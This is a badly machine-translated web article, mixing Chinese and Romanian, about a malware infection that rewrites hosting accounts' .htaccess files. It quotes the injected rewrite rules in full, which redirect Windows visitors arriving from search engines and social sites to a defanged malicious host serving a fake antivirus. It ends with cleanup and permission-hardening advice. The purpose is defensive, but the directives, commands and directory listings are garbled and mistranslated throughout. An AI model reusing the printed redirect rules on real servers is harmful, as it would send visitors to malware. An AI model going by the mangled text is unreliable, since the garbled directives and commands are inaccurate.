惡意軟件/病毒-.htaccess“重寫”並重定向

Ønoua經病毒 despre護理VAD CA怒江本身原位foarte multe,afecteaza站點URI hostate PE ,發球nesigure的 在其中可以“看到”用戶帳戶/子域帳戶的位置。 具體來說,託管帳戶都放在文件夾“虛擬主機,以及 用戶文件夾 在大多數情況下,轉銷商會將“虛擬主機”中的“價格”提供給一般用戶…… 這是不使用的Web服務器的典型方法 WHM / cPanel的的.

.htaccess病毒操作-.htaccess hack

病毒 影響文件 的。htaccess 網站的犧牲品。 我加線/ 指示訪問者重定向 (來自yahoo,msn,google,facebook,yaindex,twitter,myspace等高流量網站和門戶)到提供“殺毒”。 是關於 假冒殺毒軟件,這是我在介紹中寫道 .

國際航空運輸協會暨磯未 的。htaccess afectat:(NU accesati網址urile的DIN continutul liniilor德邁喬斯)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine敘述在

的RewriteCond%{HTTP_REFERER} * Yandex的。* $ [NC]
的RewriteCond%{HTTP_REFERER} * Odnoklassniki * $ [NC]
的RewriteCond%{HTTP_REFERER} *的Vkontakte。* $ [NC]
的RewriteCond%{HTTP_REFERER} *藍巴勒* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *管* $ [NC]
的RewriteCond%{HTTP_REFERER} *維基百科。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *博客* $ [NC]
的RewriteCond%{HTTP_REFERER} *百度* $ [NC]
的RewriteCond%{HTTP_REFERER} * Qq.com * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *的Myspace * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * Twitter的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *為必填項。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *谷歌* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *現場。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * AOL * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *冰* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * MSN * $ [NC]
的RewriteCond%{HTTP_REFERER} *亞馬遜。* $ [NC]
*易趣的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * LinkedIn * $ [NC,OR]
的RewriteCond%{HTTP_REFERER}。照片。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * LiveJasmin上。* $ [NC]
的RewriteCond%{HTTP_REFERER} *搜搜。* $ [NC]
的RewriteCond%{HTTP_REFERER} * DoubleClick的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *版權所有。Pornhub * $ [NC]
的RewriteCond%{HTTP_REFERER} * Orkut的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * LiveJournal的* $ [NC,OR]
RewriteCond% {HTTP_REFERER}。*wordpress. * $ [NC, OR]
的RewriteCond%{HTTP_REFERER} *雅虎* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *賣出* $ [NC]
*激發的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * AltaVista的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * MSN * $ [NC]
*網景的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * HOTBOT * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *轉到* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * Infoseek的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER}。媽媽。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *搜狗。* $ [NC]
的RewriteCond%{HTTP_REFERER} * Lycos的* $ [NC,OR]
*搜索的RewriteCond%{HTTP_REFERER}。* $ [NC]
RewriteCond %{HTTP_REFERER} .*metacraw呃。*$ [NC,OR]
*郵件的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * Dogpile網站。* $ [NC]

RewriteCond%{HTTP_USER_AGENT}。Windows.*
RewriteRule。* Hxxp://wwww.peoriavascularsurgery.com/main.php?H =%{HTTP_HOST}&i = J8iiidsar / qmiRj7V8NOyJoXpA ==&e = r [R,L]

RewriteCond%{REQUEST_FILENAME}!-F
的RewriteCond%{REQUEST_FILENAME}-D!
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png$
RewriteCond%{HTTP_USER_AGENT}。Windows.*
RewriteRule。* Hxxp://wwww.peoriavascularsurgery.com/main.php?H =%{HTTP_HOST}&i = J8iiidsar / qmiRj7V8NOyJoXpA ==&e = 4 [R,L]

那些使用 WordPress 他們會在文件中找到這些行 的。htaccess 您的 為public_html。 此外,病毒會創建一個相同htaccess的文件夾中。 可濕性粉劑內容.

*也有在哪些情況下而不是發生peoriavascularsurgery.com的 dns.thesoulfoodcafe.com 或其他地址。

是什麼讓這個病毒。

一旦重定向,張開雙臂迎接遊客的消息:

警告!
您的計算機包含各種跡象,表明存在病毒和惡意軟件程序。 您的 system 需要立即進行防病毒檢查!
System 安全性將對您的PC進行快速免費的掃描,以查找病毒和惡意程序。

1惡意軟件

無論我們按下哪個按鈕,我們都會轉到“我的電腦”,“模仿” 設計XP。 這是“掃描過程”自動開始的地方,最後我們發現“我們被感染了”。

2惡意軟件

之後單擊“確定”或“取消”,它將開始 下載文件 SETUP.EXE。 這 setup.exe是假的防病毒 影響系統。 你安裝一些惡意軟件,病毒進一步傳播鏈接,而且除了這些以外一個 防病毒軟件 (也是假的)邀請受害者購買的。
那些誰已經接觸病毒可能使用這種形式 。 它也建議您掃描整個硬盤。 建議 卡巴斯基互聯網安全套裝卡巴斯基反病毒.

這種類型的病毒會影響遊客OS操作系統 Windows XP, Windows ME Windows 2000, Windows NT Windows 98 si Windows 95。 到目前為止,還沒有已知的感染操作系統的案例 Windows 視線是 Windows 7.

射精putem撇銷acest病毒。:htaccess的PE服務器SI暨putem preveni infectarea。

1. Analizarea fisierelor SI stergerea codurilor suspecte。 Pentru一個NE asigura約NU埃斯特afectat numai fisierul 的。htaccess 埃斯特莖SA analizam toate fisierele 。PHP si JS。.

2。 Rescriem fisierul htaccess的SI-I setam庫存 chmod 644744 drepturi scriere numai PE立方米 用戶UL所有者.

3。 CAND SE Atunci creaza未續託管pentru聯合國網站,在folderul /家/ webroot的 本身VA CREA自動聯合國文​​件夾的護理策勒縣邁multe大利是numele的用戶ului。(用戶pentru的cPanel,FTP等)。 Pentru一個preveni的scrierea日期SI transmiterea virusi德拉聯合國用戶la altul的,埃斯特這表CA PE fiecare文件夾的用戶sa本身seteze:

chmod 指示 644 或 744、755 – 644。
chown -R 用戶名文件夾名稱。
chgrp命令-R nume_user nume_folder

LS-所有 如果他們作出正確的方法來檢查。 應該會出現這樣的事情:

drwx – x – x 12 dinamics 4096 6月14日51:XNUMX dinamics /
drwx – x – x 10 duran duran 4096 Mar 7 07:46 duran /
drwx – x – x 12試管試管4096 Jan 29 11:23試管/
drwxr-xr-x 14 Express Express 4096 26年2009月XNUMX日Express /
drwxr-xr-x 9 ezo ezo 4096 19月01日09:XNUMX ezo /
drwx – x – x 9 farma農場4096 Dec 19 22:29 farma /

如果上面任何一個是userele FTP 被感染的文件它不能發送病毒到另一個用戶主機。 這是最起碼的安全網,以保護在Web服務器上的託管賬戶。

這種類型的病毒影響的地區的常見元素。

所有受影響的域都將訪問者重定向到包含“ /”的網站main.php?s = 4和H“。

這 ”htaccess文件的病毒。”會影響任何類型的CMS(喬姆拉, WordPress,phpBB等),使用 的。htaccess

.htaccess病毒入侵和重定向.

創始人兼編輯 Stealth Settings,從 2006 年至今。 操作系統方面的經驗 Linux (特別是 CentOS), Mac OS X, Windows XP> Windows 10 si WordPress (內容管理系統)。

如何 » 防病毒和安全性 » 惡意軟件/病毒-.htaccess“重寫”並重定向
發表評論